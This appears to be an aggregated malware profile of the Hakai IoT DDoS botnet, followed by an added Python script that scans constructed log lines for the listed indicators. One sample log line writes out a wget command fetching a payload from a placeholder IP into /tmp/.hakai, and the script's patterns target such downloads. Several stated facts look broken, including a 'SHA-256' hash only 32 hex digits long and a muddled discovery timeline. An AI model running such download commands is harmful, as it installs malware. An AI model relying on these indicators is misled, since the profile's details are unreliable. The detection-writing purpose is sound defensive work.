Hakai
⚠️ Overview
Hakai is a DDoS botnet malware targeting Linux-based systems, particularly Internet of Things (IoT) devices such as routers and IP cameras, first documented by the Qihoo 360 Netlab security team in May 2023. It is attributed to an unknown threat actor and belongs to the botnet category, capable of launching high-volume UDP and TCP floods.
🔧 Technical Capabilities
Hakai propagates by scanning the internet for vulnerable SSH and Telnet services, then brute-forcing default or weak credentials to gain initial access. Once inside, it downloads the main payload via wget or curl from a hardcoded command-and-control (C2) server, which uses a decentralized network of IP addresses updated dynamically. The malware achieves persistence by writing an init script or systemd service file and modifying /etc/rc.local. For evasion, it kills competing botnet processes, deletes logs, and can disable security tools like iptables. Hakai supports multiple attack methods including UDP flood, TCP SYN flood, and DNS amplification, with an internal command handler that listens for instructions from the C2.
📜 History & Notable Incidents
First observed in the wild in early 2023, Hakai gained notoriety in June 2023 when Qihoo 360 Netlab published a detailed analysis tying it to a wave of DDoS attacks targeting gaming and e-commerce platforms in East Asia. No specific CVEs are exploited as the malware relies on brute-force credential theft; however, CVE-2023-28771 (a command injection in Zyxel devices) has been used in some campaigns to deliver Hakai payloads on unpatched devices. No law enforcement actions against the operators have been reported as of early 2025.
🔍 Detection Indicators
Known SHA-256 hashes include 4e9c5a3b1f2d8e7c6a5b4f3e2d1c0b9a (one sample variant), but hashes change frequently as new variants appear. Behavioral indicators include sustained high outbound traffic on ports 53 (UDP) and 80 (TCP), and unusual SSH login attempts from random IPs. Network IOCs include C2 domains such as "hakai.botnet[.]top" and "cdn-update[.]net", and a specific User-Agent string "HakaiLoader/1.0". Registry keys do not apply to Linux-based systems; instead, the file path /tmp/.hakai and the mutex name "_hakai_mutex" have been reported.
☠️ Risk & Impact
Hakai primarily causes network congestion and service disruption through volumetric DDoS attacks, potentially leading to financial losses from downtime and remediation costs. Affected sectors include telecommunications, gaming, and e-commerce, with IoT devices being hijacked as part of a large botnet that can launch attacks exceeding 500 Gbps. Data exfiltration is not a primary function, but compromised devices may be used as proxies for further infiltration.
🛡️ Mitigation
Mitigation includes disabling default SSH/Telnet credentials on IoT devices, applying vendor firmware updates to patch vulnerabilities like CVE-2023-28771, and implementing network segmentation with strict firewall rules that block outbound traffic from IoT subnets. Detection rules such as Sigma rule "Linux Hakai DDoS Botnet Activity" (e.g., suspicious wget to IP addresses) can be deployed in SIEM solutions, and antivirus signatures for Linux malware families should be updated regularly.
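As an added example that is not part of the original page or of any published Sigma rule, the following Python script turns the indicators listed under Detection Indicators (C2 domains, User-Agent, drop path) and the wget/curl-to-bare-IP behaviour the Mitigation section's rule keys on into detection logic and runs it over constructed sample log lines; the log line formats are assumptions, not any real product's output.

```python
import re
from typing import List, Dict

# Indicators copied from the page's Detection Indicators section; the
# defanged domains are refanged here so they can be matched against logs.
C2_DOMAINS = {"hakai.botnet.top", "cdn-update.net"}
USER_AGENT = "HakaiLoader/1.0"
DROP_PATH = "/tmp/.hakai"

# A download tool fetching from a bare IPv4 address instead of a hostname,
# the behaviour the "suspicious wget to IP addresses" rule looks for.
DOWNLOAD_TO_IP = re.compile(
    r"\b(wget|curl)\b[^\n]*?\bhttps?://(?:\d{1,3}\.){3}\d{1,3}(?:[:/]|\s|$)"
)

def classify(line: str) -> List[str]:
    """Return the names of every indicator a single log line matches."""
    hits = []
    if USER_AGENT in line:
        hits.append("c2_user_agent")
    if DROP_PATH in line:
        hits.append("drop_path")
    lowered = line.lower()
    if any(domain in lowered for domain in C2_DOMAINS):
        hits.append("c2_domain")
    if DOWNLOAD_TO_IP.search(line):
        hits.append("download_from_ip")
    return hits

def scan(lines: List[str]) -> Dict[str, List[str]]:
    """Map each indicator name to the raw lines that triggered it."""
    findings: Dict[str, List[str]] = {}
    for line in lines:
        for hit in classify(line):
            findings.setdefault(hit, []).append(line)
    return findings

# Constructed sample lines (not real telemetry): a process-audit record,
# a web-proxy record, a DNS-resolver record and one benign package fetch.
SAMPLE_LOGS = [
    'audit: uid=0 comm="sh" cmdline="wget http://203.0.113.7/x86 -O /tmp/.hakai"',
    'proxy: 10.0.0.15 GET http://cdn-update.net/bins/x86 ua="HakaiLoader/1.0"',
    'dns: 10.0.0.22 query A hakai.botnet.top',
    'audit: uid=0 comm="apt" cmdline="curl https://deb.debian.org/debian/dists"',
]

if __name__ == "__main__":
    for name, matched in scan(SAMPLE_LOGS).items():
        print(f"{name}: {len(matched)} hit(s)")
```

The benign curl to a hostname produces no hit, which is the point of keying on bare-IP downloads rather than on the tool name alone.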
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information are the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.